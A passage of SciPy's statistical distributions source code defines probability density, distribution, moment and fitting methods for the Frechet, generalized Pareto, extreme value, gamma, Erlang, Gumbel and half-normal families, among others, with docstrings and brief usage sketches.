@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def ppf(self, *args, **kwargs):
return weibull_min_gen.ppf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def rvs(self, *args, **kwargs):
return weibull_min_gen.rvs(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def sf(self, *args, **kwargs):
return weibull_min_gen.sf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def stats(self, *args, **kwargs):
return weibull_min_gen.stats(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def std(self, *args, **kwargs):
return weibull_min_gen.std(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def var(self, *args, **kwargs):
return weibull_min_gen.var(self, *args, **kwargs)
frechet_r = frechet_r_gen(a=0.0, name='frechet_r')
_frechet_l_deprec_msg = """\
The distribution `frechet_l` is a synonym for `weibull_max`; this historical
usage is deprecated because of possible confusion with the (quite different)
Frechet distribution. To preserve the existing behavior of the program, use
`scipy.stats.weibull_max`. For the Frechet distribution (i.e. the Type II
extreme value distribution), use `scipy.stats.invweibull`."""
class frechet_l_gen(weibull_max_gen):
"""A Frechet left (or Weibull maximum) continuous random variable.
%(before_notes)s
See Also
--------
weibull_max : The same distribution as `frechet_l`.
Notes
-----
%(after_notes)s
%(example)s
"""
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def __call__(self, *args, **kwargs):
return weibull_max_gen.__call__(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def cdf(self, *args, **kwargs):
return weibull_max_gen.cdf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def entropy(self, *args, **kwargs):
return weibull_max_gen.entropy(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def expect(self, *args, **kwargs):
return weibull_max_gen.expect(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def fit(self, *args, **kwargs):
return weibull_max_gen.fit(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def fit_loc_scale(self, *args, **kwargs):
return weibull_max_gen.fit_loc_scale(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def freeze(self, *args, **kwargs):
return weibull_max_gen.freeze(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def interval(self, *args, **kwargs):
return weibull_max_gen.interval(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def isf(self, *args, **kwargs):
return weibull_max_gen.isf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def logcdf(self, *args, **kwargs):
return weibull_max_gen.logcdf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def logpdf(self, *args, **kwargs):
return weibull_max_gen.logpdf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def logsf(self, *args, **kwargs):
return weibull_max_gen.logsf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def mean(self, *args, **kwargs):
return weibull_max_gen.mean(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def median(self, *args, **kwargs):
return weibull_max_gen.median(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def moment(self, *args, **kwargs):
return weibull_max_gen.moment(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def nnlf(self, *args, **kwargs):
return weibull_max_gen.nnlf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def pdf(self, *args, **kwargs):
return weibull_max_gen.pdf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def ppf(self, *args, **kwargs):
return weibull_max_gen.ppf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def rvs(self, *args, **kwargs):
return weibull_max_gen.rvs(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def sf(self, *args, **kwargs):
return weibull_max_gen.sf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def stats(self, *args, **kwargs):
return weibull_max_gen.stats(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def std(self, *args, **kwargs):
return weibull_max_gen.std(self, *args, **kwargs)
@np.deprecate(old_name='frechet_l', message=_frechet_l_deprec_msg)
def var(self, *args, **kwargs):
return weibull_max_gen.var(self, *args, **kwargs)
frechet_l = frechet_l_gen(b=0.0, name='frechet_l')
class genlogistic_gen(rv_continuous):
r"""A generalized logistic continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `genlogistic` is:
.. math::
f(x, c) = c \frac{\exp(-x)}
{(1 + \exp(-x))^{c+1}}
    for real :math:`x` and :math:`c > 0`.
`genlogistic` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x, c):
# genlogistic.pdf(x, c) = c * exp(-x) / (1 + exp(-x))**(c+1)
return np.exp(self._logpdf(x, c))
def _logpdf(self, x, c):
return np.log(c) - x - (c+1.0)*sc.log1p(np.exp(-x))
def _cdf(self, x, c):
Cx = (1+np.exp(-x))**(-c)
return Cx
def _ppf(self, q, c):
vals = -np.log(pow(q, -1.0/c)-1)
return vals
def _stats(self, c):
mu = _EULER + sc.psi(c)
mu2 = np.pi*np.pi/6.0 + sc.zeta(2, c)
g1 = -2*sc.zeta(3, c) + 2*_ZETA3
g1 /= np.power(mu2, 1.5)
g2 = np.pi**4/15.0 + 6*sc.zeta(4, c)
g2 /= mu2**2.0
return mu, mu2, g1, g2
genlogistic = genlogistic_gen(name='genlogistic')
class genpareto_gen(rv_continuous):
r"""A generalized Pareto continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `genpareto` is:
.. math::
f(x, c) = (1 + c x)^{-1 - 1/c}
defined for :math:`x \ge 0` if :math:`c \ge 0`, and for
:math:`0 \le x \le -1/c` if :math:`c < 0`.
`genpareto` takes ``c`` as a shape parameter for :math:`c`.
For :math:`c=0`, `genpareto` reduces to the exponential
distribution, `expon`:
.. math::
f(x, 0) = \exp(-x)
For :math:`c=-1`, `genpareto` is uniform on ``[0, 1]``:
.. math::
f(x, -1) = 1
%(after_notes)s
%(example)s
"""
def _argcheck(self, c):
return np.isfinite(c)
def _get_support(self, c):
c = np.asarray(c)
b = _lazywhere(c < 0, (c,),
lambda c: -1. / c,
np.inf)
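        # The lower endpoint does not actually depend on c; the np.where
        # below only broadcasts self.a to the shape of c.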
a = np.where(c >= 0, self.a, self.a)
return a, b
def _pdf(self, x, c):
# genpareto.pdf(x, c) = (1 + c * x)**(-1 - 1/c)
return np.exp(self._logpdf(x, c))
def _logpdf(self, x, c):
return _lazywhere((x == x) & (c != 0), (x, c),
lambda x, c: -sc.xlog1py(c + 1., c*x) / c,
-x)
def _cdf(self, x, c):
return -sc.inv_boxcox1p(-x, -c)
def _sf(self, x, c):
return sc.inv_boxcox(-x, -c)
def _logsf(self, x, c):
return _lazywhere((x == x) & (c != 0), (x, c),
lambda x, c: -sc.log1p(c*x) / c,
-x)
def _ppf(self, q, c):
return -sc.boxcox1p(-q, -c)
def _isf(self, q, c):
return -sc.boxcox(q, -c)
def _munp(self, n, c):
def __munp(n, c):
val = 0.0
k = np.arange(0, n + 1)
for ki, cnk in zip(k, sc.comb(n, k)):
val = val + cnk * (-1) ** ki / (1.0 - c * ki)
return np.where(c * n < 1, val * (-1.0 / c) ** n, np.inf)
return _lazywhere(c != 0, (c,),
lambda c: __munp(n, c),
sc.gamma(n + 1))
def _entropy(self, c):
return 1. + c
genpareto = genpareto_gen(a=0.0, name='genpareto')
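# Sketch of the c=0 special case in the docstring: the pdf coincides with
# the exponential pdf (value illustrative):
#
# >>> import numpy as np
# >>> from scipy import stats
# >>> np.allclose(stats.genpareto.pdf(1.0, 0), stats.expon.pdf(1.0))
# True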
class genexpon_gen(rv_continuous):
r"""A generalized exponential continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `genexpon` is:
.. math::
f(x, a, b, c) = (a + b (1 - \exp(-c x)))
\exp(-a x - b x + \frac{b}{c} (1-\exp(-c x)))
for :math:`x \ge 0`, :math:`a, b, c > 0`.
`genexpon` takes :math:`a`, :math:`b` and :math:`c` as shape parameters.
%(after_notes)s
References
----------
H.K. Ryu, "An Extension of Marshall and Olkin's Bivariate Exponential
Distribution", Journal of the American Statistical Association, 1993.
N. Balakrishnan, "The Exponential Distribution: Theory, Methods and
Applications", Asit P. Basu.
%(example)s
"""
def _pdf(self, x, a, b, c):
# genexpon.pdf(x, a, b, c) = (a + b * (1 - exp(-c*x))) * \
# exp(-a*x - b*x + b/c * (1-exp(-c*x)))
return (a + b*(-sc.expm1(-c*x)))*np.exp((-a-b)*x +
b*(-sc.expm1(-c*x))/c)
def _cdf(self, x, a, b, c):
return -sc.expm1((-a-b)*x + b*(-sc.expm1(-c*x))/c)
def _logpdf(self, x, a, b, c):
return np.log(a+b*(-sc.expm1(-c*x))) + (-a-b)*x+b*(-sc.expm1(-c*x))/c
genexpon = genexpon_gen(a=0.0, name='genexpon')
class genextreme_gen(rv_continuous):
r"""A generalized extreme value continuous random variable.
%(before_notes)s
See Also
--------
gumbel_r
Notes
-----
For :math:`c=0`, `genextreme` is equal to `gumbel_r`.
The probability density function for `genextreme` is:
.. math::
f(x, c) = \begin{cases}
\exp(-\exp(-x)) \exp(-x) &\text{for } c = 0\\
\exp(-(1-c x)^{1/c}) (1-c x)^{1/c-1} &\text{for }
x \le 1/c, c > 0
\end{cases}
Note that several sources and software packages use the opposite
convention for the sign of the shape parameter :math:`c`.
`genextreme` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _argcheck(self, c):
return np.where(abs(c) == np.inf, 0, 1)
def _get_support(self, c):
_b = np.where(c > 0, 1.0 / np.maximum(c, _XMIN), np.inf)
_a = np.where(c < 0, 1.0 / np.minimum(c, -_XMIN), -np.inf)
return _a, _b
def _loglogcdf(self, x, c):
return _lazywhere((x == x) & (c != 0), (x, c),
lambda x, c: sc.log1p(-c*x)/c, -x)
def _pdf(self, x, c):
# genextreme.pdf(x, c) =
# exp(-exp(-x))*exp(-x), for c==0
# exp(-(1-c*x)**(1/c))*(1-c*x)**(1/c-1), for x \le 1/c, c > 0
return np.exp(self._logpdf(x, c))
def _logpdf(self, x, c):
cx = _lazywhere((x == x) & (c != 0), (x, c), lambda x, c: c*x, 0.0)
logex2 = sc.log1p(-cx)
logpex2 = self._loglogcdf(x, c)
pex2 = np.exp(logpex2)
# Handle special cases
np.putmask(logpex2, (c == 0) & (x == -np.inf), 0.0)
logpdf = np.where((cx == 1) | (cx == -np.inf),
-np.inf,
-pex2+logpex2-logex2)
np.putmask(logpdf, (c == 1) & (x == 1), 0.0)
return logpdf
def _logcdf(self, x, c):
return -np.exp(self._loglogcdf(x, c))
def _cdf(self, x, c):
return np.exp(self._logcdf(x, c))
def _sf(self, x, c):
return -sc.expm1(self._logcdf(x, c))
def _ppf(self, q, c):
x = -np.log(-np.log(q))
return _lazywhere((x == x) & (c != 0), (x, c),
lambda x, c: -sc.expm1(-c * x) / c, x)
def _isf(self, q, c):
x = -np.log(-sc.log1p(-q))
return _lazywhere((x == x) & (c != 0), (x, c),
lambda x, c: -sc.expm1(-c * x) / c, x)
def _stats(self, c):
g = lambda n: sc.gamma(n*c + 1)
g1 = g(1)
g2 = g(2)
g3 = g(3)
g4 = g(4)
g2mg12 = np.where(abs(c) < 1e-7, (c*np.pi)**2.0/6.0, g2-g1**2.0)
gam2k = np.where(abs(c) < 1e-7, np.pi**2.0/6.0,
sc.expm1(sc.gammaln(2.0*c+1.0)-2*sc.gammaln(c + 1.0))/c**2.0)
eps = 1e-14
gamk = np.where(abs(c) < eps, -_EULER, sc.expm1(sc.gammaln(c + 1))/c)
m = np.where(c < -1.0, np.nan, -gamk)
v = np.where(c < -0.5, np.nan, g1**2.0*gam2k)
# skewness
sk1 = _lazywhere(c >= -1./3,
(c, g1, g2, g3, g2mg12),
                         lambda c, g1, g2, g3, g2mg12:
np.sign(c)*(-g3 + (g2 + 2*g2mg12)*g1)/g2mg12**1.5,
fillvalue=np.nan)
sk = np.where(abs(c) <= eps**0.29, 12*np.sqrt(6)*_ZETA3/np.pi**3, sk1)
# kurtosis
ku1 = _lazywhere(c >= -1./4,
(g1, g2, g3, g4, g2mg12),
lambda g1, g2, g3, g4, g2mg12:
(g4 + (-4*g3 + 3*(g2 + g2mg12)*g1)*g1)/g2mg12**2,
fillvalue=np.nan)
ku = np.where(abs(c) <= (eps)**0.23, 12.0/5.0, ku1-3.0)
return m, v, sk, ku
def _fitstart(self, data):
# This is better than the default shape of (1,).
g = _skew(data)
if g < 0:
a = 0.5
else:
a = -0.5
return super(genextreme_gen, self)._fitstart(data, args=(a,))
def _munp(self, n, c):
k = np.arange(0, n+1)
vals = 1.0/c**n * np.sum(
sc.comb(n, k) * (-1)**k * sc.gamma(c*k + 1),
axis=0)
return np.where(c*n > -1, vals, np.inf)
def _entropy(self, c):
return _EULER*(1 - c) + 1
genextreme = genextreme_gen(name='genextreme')
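# Sketch of the docstring note that genextreme with c=0 equals gumbel_r
# (value illustrative):
#
# >>> import numpy as np
# >>> from scipy import stats
# >>> np.allclose(stats.genextreme.cdf(0.5, 0), stats.gumbel_r.cdf(0.5))
# True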
def _digammainv(y):
# Inverse of the digamma function (real positive arguments only).
# This function is used in the `fit` method of `gamma_gen`.
# The function uses either optimize.fsolve or optimize.newton
# to solve `sc.digamma(x) - y = 0`. There is probably room for
# improvement, but currently it works over a wide range of y:
# >>> y = 64*np.random.randn(1000000)
# >>> y.min(), y.max()
# (-311.43592651416662, 351.77388222276869)
    # >>> x = [_digammainv(t) for t in y]
    # >>> np.abs(sc.digamma(x) - y).max()
# 1.1368683772161603e-13
#
_em = 0.5772156649015328606065120
func = lambda x: sc.digamma(x) - y
if y > -0.125:
x0 = np.exp(y) + 0.5
if y < 10:
# Some experimentation shows that newton reliably converges
            # much faster than fsolve in this y range. For larger y,
# newton sometimes fails to converge.
value = optimize.newton(func, x0, tol=1e-10)
return value
elif y > -3:
x0 = np.exp(y/2.332) + 0.08661
else:
x0 = 1.0 / (-y - _em)
value, info, ier, mesg = optimize.fsolve(func, x0, xtol=1e-11,
full_output=True)
if ier != 1:
raise RuntimeError("_digammainv: fsolve failed, y = %r" % y)
return value[0]
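# Usage sketch for the module-internal helper above (illustrative): the
# result should invert sc.digamma to within solver tolerance:
#
# >>> import scipy.special as sc
# >>> x = _digammainv(0.0)
# >>> abs(sc.digamma(x)) < 1e-8
# True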
## Gamma (Use MATLAB and MATHEMATICA (b=theta=scale, a=alpha=shape) definition)
## gamma(a, loc, scale) with a an integer is the Erlang distribution
## gamma(1, loc, scale) is the Exponential distribution
## gamma(df/2, 0, 2) is the chi2 distribution with df degrees of freedom.
class gamma_gen(rv_continuous):
r"""A gamma continuous random variable.
%(before_notes)s
See Also
--------
erlang, expon
Notes
-----
The probability density function for `gamma` is:
.. math::
f(x, a) = \frac{x^{a-1} \exp(-x)}{\Gamma(a)}
for :math:`x \ge 0`, :math:`a > 0`. Here :math:`\Gamma(a)` refers to the
gamma function.
`gamma` takes ``a`` as a shape parameter for :math:`a`.
When :math:`a` is an integer, `gamma` reduces to the Erlang
distribution, and when :math:`a=1` to the exponential distribution.
%(after_notes)s
%(example)s
"""
def _rvs(self, a):
return self._random_state.standard_gamma(a, self._size)
def _pdf(self, x, a):
# gamma.pdf(x, a) = x**(a-1) * exp(-x) / gamma(a)
return np.exp(self._logpdf(x, a))
def _logpdf(self, x, a):
return sc.xlogy(a-1.0, x) - x - sc.gammaln(a)
def _cdf(self, x, a):
return sc.gammainc(a, x)
def _sf(self, x, a):
return sc.gammaincc(a, x)
def _ppf(self, q, a):
return sc.gammaincinv(a, q)
def _stats(self, a):
return a, a, 2.0/np.sqrt(a), 6.0/a
def _entropy(self, a):
return sc.psi(a)*(1-a) + a + sc.gammaln(a)
def _fitstart(self, data):
        # The skewness of the gamma distribution is `2 / np.sqrt(a)`.
# We invert that to estimate the shape `a` using the skewness
# of the data. The formula is regularized with 1e-8 in the
# denominator to allow for degenerate data where the skewness
# is close to 0.
a = 4 / (1e-8 + _skew(data)**2)
return super(gamma_gen, self)._fitstart(data, args=(a,))
@extend_notes_in_docstring(rv_continuous, notes="""\
When the location is fixed by using the argument `floc`, this
function uses explicit formulas or solves a simpler numerical
problem than the full ML optimization problem. So in that case,
the `optimizer`, `loc` and `scale` arguments are ignored.\n\n""")
def fit(self, data, *args, **kwds):
floc = kwds.get('floc', None)
if floc is None:
# loc is not fixed. Use the default fit method.
return super(gamma_gen, self).fit(data, *args, **kwds)
# We already have this value, so just pop it from kwds.
kwds.pop('floc', None)
f0 = _get_fixed_fit_value(kwds, ['f0', 'fa', 'fix_a'])
fscale = kwds.pop('fscale', None)
_remove_optimizer_parameters(kwds)
# Special case: loc is fixed.
if f0 is not None and fscale is not None:
# This check is for consistency with `rv_continuous.fit`.
# Without this check, this function would just return the
# parameters that were given.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
# Fixed location is handled by shifting the data.
data = np.asarray(data)
if np.any(data <= floc):
raise FitDataError("gamma", lower=floc, upper=np.inf)
if floc != 0:
# Don't do the subtraction in-place, because `data` might be a
# view of the input array.
data = data - floc
xbar = data.mean()
# Three cases to handle:
# * shape and scale both free
# * shape fixed, scale free
# * shape free, scale fixed
if fscale is None:
# scale is free
if f0 is not None:
# shape is fixed
a = f0
else:
# shape and scale are both free.
# The MLE for the shape parameter `a` is the solution to:
# np.log(a) - sc.digamma(a) - np.log(xbar) +
                #     np.log(data).mean() = 0
s = np.log(xbar) - np.log(data).mean()
func = lambda a: np.log(a) - sc.digamma(a) - s
aest = (3-s + np.sqrt((s-3)**2 + 24*s)) / (12*s)
xa = aest*(1-0.4)
xb = aest*(1+0.4)
a = optimize.brentq(func, xa, xb, disp=0)
# The MLE for the scale parameter is just the data mean
# divided by the shape parameter.
scale = xbar / a
else:
# scale is fixed, shape is free
# The MLE for the shape parameter `a` is the solution to:
# sc.digamma(a) - np.log(data).mean() + np.log(fscale) = 0
c = np.log(data).mean() - np.log(fscale)
a = _digammainv(c)
scale = fscale
return a, floc, scale
gamma = gamma_gen(a=0.0, name='gamma')
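# Usage sketch of the specialized fit path above (illustrative data): with
# floc=0 the fitted parameters satisfy a * scale == mean of the data:
#
# >>> import numpy as np
# >>> from scipy import stats
# >>> a, loc, scale = stats.gamma.fit([1.0, 2.0, 3.0, 4.0], floc=0)
# >>> np.isclose(a * scale, 2.5)
# True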
class erlang_gen(gamma_gen):
"""An Erlang continuous random variable.
%(before_notes)s
See Also
--------
gamma
Notes
-----
The Erlang distribution is a special case of the Gamma distribution, with
the shape parameter `a` an integer. Note that this restriction is not
enforced by `erlang`. It will, however, generate a warning the first time
a non-integer value is used for the shape parameter.
Refer to `gamma` for examples.
"""
def _argcheck(self, a):
allint = np.all(np.floor(a) == a)
allpos = np.all(a > 0)
if not allint:
# An Erlang distribution shouldn't really have a non-integer
# shape parameter, so warn the user.
warnings.warn(
'The shape parameter of the erlang distribution '
'has been given a non-integer value %r.' % (a,),
RuntimeWarning)
return allpos
def _fitstart(self, data):
        # Override gamma_gen._fitstart so that an integer initial value is
# used. (Also regularize the division, to avoid issues when
# _skew(data) is 0 or close to 0.)
a = int(4.0 / (1e-8 + _skew(data)**2))
return super(gamma_gen, self)._fitstart(data, args=(a,))
# Trivial override of the fit method, so we can monkey-patch its
# docstring.
def fit(self, data, *args, **kwds):
return super(erlang_gen, self).fit(data, *args, **kwds)
if fit.__doc__ is not None:
fit.__doc__ = (rv_continuous.fit.__doc__ +
"""
Notes
-----
The Erlang distribution is generally defined to have integer values
for the shape parameter. This is not enforced by the `erlang` class.
When fitting the distribution, it will generally return a non-integer
value for the shape parameter. By using the keyword argument
`f0=<integer>`, the fit method can be constrained to fit the data to
a specific integer shape parameter.
""")
erlang = erlang_gen(a=0.0, name='erlang')
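# Sketch of constraining the Erlang fit to an integer shape, as described
# in the patched fit docstring above (illustrative data):
#
# >>> from scipy import stats
# >>> a, loc, scale = stats.erlang.fit([1.0, 2.0, 3.0, 4.0], f0=2, floc=0)
# >>> a, scale
# (2, 1.25)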
class gengamma_gen(rv_continuous):
r"""A generalized gamma continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `gengamma` is:
.. math::
f(x, a, c) = \frac{|c| x^{c a-1} \exp(-x^c)}{\Gamma(a)}
for :math:`x \ge 0`, :math:`a > 0`, and :math:`c \ne 0`.
:math:`\Gamma` is the gamma function (`scipy.special.gamma`).
`gengamma` takes :math:`a` and :math:`c` as shape parameters.
%(after_notes)s
%(example)s
"""
def _argcheck(self, a, c):
return (a > 0) & (c != 0)
def _pdf(self, x, a, c):
# gengamma.pdf(x, a, c) = abs(c) * x**(c*a-1) * exp(-x**c) / gamma(a)
return np.exp(self._logpdf(x, a, c))
def _logpdf(self, x, a, c):
return np.log(abs(c)) + sc.xlogy(c*a - 1, x) - x**c - sc.gammaln(a)
def _cdf(self, x, a, c):
xc = x**c
val1 = sc.gammainc(a, xc)
val2 = sc.gammaincc(a, xc)
return np.where(c > 0, val1, val2)
def _sf(self, x, a, c):
xc = x**c
val1 = sc.gammainc(a, xc)
val2 = sc.gammaincc(a, xc)
return np.where(c > 0, val2, val1)
def _ppf(self, q, a, c):
val1 = sc.gammaincinv(a, q)
val2 = sc.gammainccinv(a, q)
return np.where(c > 0, val1, val2)**(1.0/c)
def _isf(self, q, a, c):
val1 = sc.gammaincinv(a, q)
val2 = sc.gammainccinv(a, q)
return np.where(c > 0, val2, val1)**(1.0/c)
def _munp(self, n, a, c):
        # Pochhammer symbol: sc.poch(a, n) = gamma(a+n)/gamma(a)
return sc.poch(a, n*1.0/c)
def _entropy(self, a, c):
val = sc.psi(a)
return a*(1-val) + 1.0/c*val + sc.gammaln(a) - np.log(abs(c))
gengamma = gengamma_gen(a=0.0, name='gengamma')
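# Consistency sketch (illustrative values): with c=1 the generalized gamma
# reduces to the ordinary gamma distribution:
#
# >>> import numpy as np
# >>> from scipy import stats
# >>> np.allclose(stats.gengamma.pdf(1.3, 2.0, 1.0),
# ...             stats.gamma.pdf(1.3, 2.0))
# True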
class genhalflogistic_gen(rv_continuous):
r"""A generalized half-logistic continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `genhalflogistic` is:
.. math::
f(x, c) = \frac{2 (1 - c x)^{1/(c-1)}}{[1 + (1 - c x)^{1/c}]^2}
for :math:`0 \le x \le 1/c`, and :math:`c > 0`.
`genhalflogistic` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _argcheck(self, c):
return c > 0
def _get_support(self, c):
return self.a, 1.0/c
def _pdf(self, x, c):
# genhalflogistic.pdf(x, c) =
# 2 * (1-c*x)**(1/c-1) / (1+(1-c*x)**(1/c))**2
limit = 1.0/c
tmp = np.asarray(1-c*x)
tmp0 = tmp**(limit-1)
tmp2 = tmp0*tmp
return 2*tmp0 / (1+tmp2)**2
def _cdf(self, x, c):
limit = 1.0/c
tmp = np.asarray(1-c*x)
tmp2 = tmp**(limit)
return (1.0-tmp2) / (1+tmp2)
def _ppf(self, q, c):
return 1.0/c*(1-((1.0-q)/(1.0+q))**c)
def _entropy(self, c):
return 2 - (2*c+1)*np.log(2)
genhalflogistic = genhalflogistic_gen(a=0.0, name='genhalflogistic')
class gompertz_gen(rv_continuous):
r"""A Gompertz (or truncated Gumbel) continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `gompertz` is:
.. math::
f(x, c) = c \exp(x) \exp(-c (e^x-1))
for :math:`x \ge 0`, :math:`c > 0`.
`gompertz` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x, c):
# gompertz.pdf(x, c) = c * exp(x) * exp(-c*(exp(x)-1))
return np.exp(self._logpdf(x, c))
def _logpdf(self, x, c):
return np.log(c) + x - c * sc.expm1(x)
def _cdf(self, x, c):
return -sc.expm1(-c * sc.expm1(x))
def _ppf(self, q, c):
return sc.log1p(-1.0 / c * sc.log1p(-q))
def _entropy(self, c):
return 1.0 - np.log(c) - np.exp(c)*sc.expn(1, c)
gompertz = gompertz_gen(a=0.0, name='gompertz')
class gumbel_r_gen(rv_continuous):
r"""A right-skewed Gumbel continuous random variable.
%(before_notes)s
See Also
--------
gumbel_l, gompertz, genextreme
Notes
-----
The probability density function for `gumbel_r` is:
.. math::
f(x) = \exp(-(x + e^{-x}))
The Gumbel distribution is sometimes referred to as a type I Fisher-Tippett
distribution. It is also related to the extreme value distribution,
log-Weibull and Gompertz distributions.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# gumbel_r.pdf(x) = exp(-(x + exp(-x)))
return np.exp(self._logpdf(x))
def _logpdf(self, x):
return -x - np.exp(-x)
def _cdf(self, x):
return np.exp(-np.exp(-x))
def _logcdf(self, x):
return -np.exp(-x)
def _ppf(self, q):
return -np.log(-np.log(q))
def _stats(self):
return _EULER, np.pi*np.pi/6.0, 12*np.sqrt(6)/np.pi**3 * _ZETA3, 12.0/5
def _entropy(self):
# https://en.wikipedia.org/wiki/Gumbel_distribution
return _EULER + 1.
gumbel_r = gumbel_r_gen(name='gumbel_r')
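# Numeric sketch of the _stats values above: the mean is the
# Euler-Mascheroni constant:
#
# >>> import numpy as np
# >>> from scipy import stats
# >>> np.isclose(stats.gumbel_r.mean(), np.euler_gamma)
# True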
class gumbel_l_gen(rv_continuous):
r"""A left-skewed Gumbel continuous random variable.
%(before_notes)s
See Also
--------
gumbel_r, gompertz, genextreme
Notes
-----
The probability density function for `gumbel_l` is:
.. math::
f(x) = \exp(x - e^x)
The Gumbel distribution is sometimes referred to as a type I Fisher-Tippett
distribution. It is also related to the extreme value distribution,
log-Weibull and Gompertz distributions.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# gumbel_l.pdf(x) = exp(x - exp(x))
return np.exp(self._logpdf(x))
def _logpdf(self, x):
return x - np.exp(x)
def _cdf(self, x):
return -sc.expm1(-np.exp(x))
def _ppf(self, q):
return np.log(-sc.log1p(-q))
def _logsf(self, x):
return -np.exp(x)
def _sf(self, x):
return np.exp(-np.exp(x))
def _isf(self, x):
return np.log(-np.log(x))
def _stats(self):
return -_EULER, np.pi*np.pi/6.0, \
-12*np.sqrt(6)/np.pi**3 * _ZETA3, 12.0/5
def _entropy(self):
return _EULER + 1.
gumbel_l = gumbel_l_gen(name='gumbel_l')
class halfcauchy_gen(rv_continuous):
r"""A Half-Cauchy continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `halfcauchy` is:
.. math::
f(x) = \frac{2}{\pi (1 + x^2)}
for :math:`x \ge 0`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# halfcauchy.pdf(x) = 2 / (pi * (1 + x**2))
return 2.0/np.pi/(1.0+x*x)
def _logpdf(self, x):
return np.log(2.0/np.pi) - sc.log1p(x*x)
def _cdf(self, x):
return 2.0/np.pi*np.arctan(x)
def _ppf(self, q):
return np.tan(np.pi/2*q)
def _stats(self):
return np.inf, np.inf, np.nan, np.nan
def _entropy(self):
return np.log(2*np.pi)
halfcauchy = halfcauchy_gen(a=0.0, name='halfcauchy')
class halflogistic_gen(rv_continuous):
r"""A half-logistic continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `halflogistic` is:
.. math::
f(x) = \frac{ 2 e^{-x} }{ (1+e^{-x})^2 }
= \frac{1}{2} \text{sech}(x/2)^2
for :math:`x \ge 0`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# halflogistic.pdf(x) = 2 * exp(-x) / (1+exp(-x))**2
# = 1/2 * sech(x/2)**2
return np.exp(self._logpdf(x))
def _logpdf(self, x):
return np.log(2) - x - 2. * sc.log1p(np.exp(-x))
def _cdf(self, x):
return np.tanh(x/2.0)
def _ppf(self, q):
return 2*np.arctanh(q)
def _munp(self, n):
if n == 1:
return 2*np.log(2)
if n == 2:
return np.pi*np.pi/3.0
if n == 3:
return 9*_ZETA3
if n == 4:
return 7*np.pi**4 / 15.0
return 2*(1-pow(2.0, 1-n))*sc.gamma(n+1)*sc.zeta(n, 1)
def _entropy(self):
return 2-np.log(2)
halflogistic = halflogistic_gen(a=0.0, name='halflogistic')
class halfnorm_gen(rv_continuous):
r"""A half-normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `halfnorm` is:
.. math::
f(x) = \sqrt{2/\pi} \exp(-x^2 / 2)
for :math:`x >= 0`.
`halfnorm` is a special case of `chi` with ``df=1``.
%(after_notes)s
%(example)s
"""
def _rvs(self):
return abs(self._random_state.standard_normal(size=self._size))
def _pdf(self, x):
# halfnorm.pdf(x) = sqrt(2/pi) * exp(-x**2/2)
return np.sqrt(2.0/np.pi)*np.exp(-x*x/2.0)
def _logpdf(self, x):
return 0.5 * np.log(2.0/np.pi) - x*x/2.0
def _cdf(self, x):
return _norm_cdf(x)*2-1.0
def _ppf(self, q):
return sc.ndtri((1+q)/2.0)
def _stats(self):
return (np.sqrt(2.0/np.pi),
1-2.0/np.pi,
